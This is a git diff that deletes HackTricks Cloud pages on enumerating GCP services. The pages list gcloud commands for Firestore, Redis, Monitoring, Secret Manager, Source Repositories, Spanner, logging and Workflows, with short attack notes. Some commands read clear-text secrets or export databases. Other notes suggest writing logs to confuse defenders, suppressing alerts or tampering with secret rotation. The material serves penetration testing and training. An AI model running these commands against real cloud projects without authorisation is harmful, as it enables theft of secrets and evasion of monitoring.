-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md deleted file mode 100644 index 4eb8b93c3..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md +++ /dev/null @@ -1,43 +0,0 @@ -# GCP - Firestore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/) - -Cloud Firestore, provided by Firebase and Google Cloud, is a **database that is both scalable and flexible, catering to mobile, web, and server development needs**. Its functionalities are akin to those of Firebase Realtime Database, ensuring data synchronization across client applications with realtime listeners. A significant feature of Cloud Firestore is its support for offline operations on mobile and web platforms, enhancing app responsiveness even in conditions of high network latency or absence of internet connection. Moreover, it is designed to integrate smoothly with other products from Firebase and Google Cloud, such as Cloud Functions. - -```bash -gcloud firestore indexes composite list -gcloud firestore indexes composite describe -gcloud firestore indexes fields list -gcloud firestore indexes fields describe -gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md deleted file mode 100644 index 169225779..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Memorystore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Memorystore - -Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more. - -```bash -# Memcache -gcloud memcache instances list --region -gcloud memcache instances describe --region -# You should try to connect to the memcache instances to access the data - -# Redis -gcloud redis instances list --region -gcloud redis instances describe --region -gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md deleted file mode 100644 index d19210668..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# GCP - Monitoring Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment: - -### Policies - -Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS). - -### Dashboards - -Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution. - -### Channels - -Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more. - -Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**. - -### Snoozers - -A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy. - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Get policies -gcloud alpha monitoring policies list -gcloud alpha monitoring policies describe - -# Get dashboards -gcloud monitoring dashboards list -gcloud monitoring dashboards describe - -# Get snoozers -gcloud monitoring snoozes list -gcloud monitoring snoozes describe - -# Get Channels -gcloud alpha monitoring channels list -gcloud alpha monitoring channels describe -``` -{% endcode %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-monitoring-post-exploitation.md" %} -[gcp-monitoring-post-exploitation.md](../gcp-post-exploitation/gcp-monitoring-post-exploitation.md) -{% endcontent-ref %} - -## References - -* [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md deleted file mode 100644 index 87ea24f72..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md +++ /dev/null @@ -1,79 +0,0 @@ -# GCP - Secrets Manager Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secret Manager - -Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data. - -A secret can have **different versions storing different data**. - -Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret. - -Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**. - -It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**. - -### Enumeration - -```bash -# First, list the entries -gcloud secrets list -gcloud secrets get-iam-policy - -# Then, pull the clear-text of any version of any secret -gcloud secrets versions list -gcloud secrets versions access 1 --secret="" -``` - -### Privilege Escalation - -In the following page you can check how to **abuse secretmanager permissions to escalate privileges.** - -{% content-ref url="../gcp-privilege-escalation/gcp-secretmanager-privesc.md" %} -[gcp-secretmanager-privesc.md](../gcp-privilege-escalation/gcp-secretmanager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %} -[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-secret-manager-persistence.md" %} -[gcp-secret-manager-persistence.md](../gcp-persistence/gcp-secret-manager-persistence.md) -{% endcontent-ref %} - -### Rotation misuse - -An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md deleted file mode 100644 index 764278cea..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md +++ /dev/null @@ -1,95 +0,0 @@ -# GCP - Source Repositories Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code. - -Key features of Cloud Source Repositories include: - -1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows. -2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment. -3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles. -4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices. -5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews. -6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories. - -### OffSec information - -* The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background. -* To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**. -* You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms). -* It's possible to **code & debug from inside GCP**. -* By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled. - -### Open In Cloud Shell - -It's possible to open the repository in Cloud Shell, a prompt like this one will appear: - -
- -This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised). - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Repos enumeration -gcloud source repos list #Get names and URLs -gcloud source repos describe -gcloud source repos get-iam-policy - -# gcloud repo clone -gcloud source repos clone -gcloud source repos get-iam-policy -... git add & git commit -m ... -git push --set-upstream origin master -git push -u origin master - -# Access via git -## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command) -git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ -git add, commit, push... -``` -{% endcode %} - -### Privilege Escalation & Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-sourcerepos-privesc.md" %} -[gcp-sourcerepos-privesc.md](../gcp-privilege-escalation/gcp-sourcerepos-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md" %} -[gcp-source-repositories-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md deleted file mode 100644 index 7f6921598..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - Spanner Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/) - -Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability. - -```bash -# Cloud Spanner -## Instances -gcloud spanner instances list -gcloud spanner instances describe -gcloud spanner instances get-iam-policy - -## Databases -gcloud spanner databases list --instance -gcloud spanner databases describe --instance -gcloud spanner databases get-iam-policy --instance -gcloud spanner databases execute-sql --instance --sql - -## Backups -gcloud spanner backups list --instance -gcloud spanner backups get-iam-policy --instance - -## Instance Configs -gcloud spanner instance-configs list -gcloud spanner instance-configs describe -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md deleted file mode 100644 index 1e9390a4e..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md +++ /dev/null @@ -1,59 +0,0 @@ -# GCP - Stackdriver Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/) - -[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more. - -For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information. - -To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended. - -```bash -# List logs -gcloud logging logs list - -# Read logs -gcloud logging read [FOLDER] - -# Write logs -# An attacker writing logs may confuse the Blue Team -gcloud logging write [FOLDER] [MESSAGE] - -# List Buckets -gcloud logging buckets list -``` - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) -* [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md deleted file mode 100644 index 4e909b9c1..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md +++ /dev/null @@ -1,67 +0,0 @@ -# GCP - Workflows Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step. - -### Encryption - -Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers. - -## Enumeration - -{% hint style="danger" %} -You can also check the output of previous executions to look for sensitive information -{% endhint %} - -{% code overflow="wrap" %} -```bash -# List Workflows -gcloud workflows list - -# Get info and yaml of an specific workflow -gcloud workflows describe - -# List executions -gcloud workflows executions list workflow-1 - -# Get execution info and output -gcloud workflows executions describe projects//locations//workflows//executions/ -``` -{% endcode %} - -### Privesc and Post Exploitation - -{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %} -[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md deleted file mode 100644 index fd78bc1bb..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md +++ /dev/null @@ -1,44 +0,0 @@ -# GCP - Unauthenticated Enum & Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Assets Discovery - -One way to discover public cloud resources that belongs to a company is to scrape their webs looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web an search for **links to public cloud resources** (in this case this tools searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`) - -Note that other cloud resources could be searched for and that some times these resources are hidden behind **subdomains that are pointing them via CNAME registry**. - -## Public Resources Brute-Force - -### Buckets, Firebase, Apps & Cloud Functions - -* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud_enum): This tool in GCP brute-force Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions -* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-force Buckets and Apps. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md deleted file mode 100644 index 80e5cfb49..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md +++ /dev/null @@ -1,78 +0,0 @@ -# GCP - API Keys Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
